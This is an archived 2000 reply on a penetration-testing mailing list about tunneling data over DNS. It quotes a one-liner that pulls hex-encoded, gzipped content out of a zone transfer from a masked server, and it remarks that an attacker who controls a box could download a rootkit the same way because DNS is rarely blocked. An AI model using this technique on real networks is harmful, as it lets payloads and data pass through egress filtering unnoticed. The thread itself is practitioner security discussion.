Penetration Testing mailing list archives

Re: [PEN-TEST] IP Tunneling over DNS

From: matthew patton <mep () NETSEC NET>
Date: Tue, 12 Sep 2000 11:46:58 -0400

heh, a friend just showed me this: (details changed to protect the site)

dig @xxx.xxx.xxx.xxx foo.org. axfr|grep
'^c..\.'|sort|cut -b5-36|perl -e
'while(<>){print pack("H32",$_)}'|gzip -d

It gives you the DeCSS source code. Now that's pretty impressive
tunneling. So let's say I gain control of the box and want to download a
root kit. This is definately one way to do it... And everybody allows DNS
through, right? :-)

--
Network Security Technologies Inc. - Commercial support for OpenBSD
www.netsec.net       (703) 561-0420       matthew.patton () netsec net

"Government is not reason; it is not eloquence; it is force!
 Like fire, it is a dangerous servant and a fearful master."
  - George Washington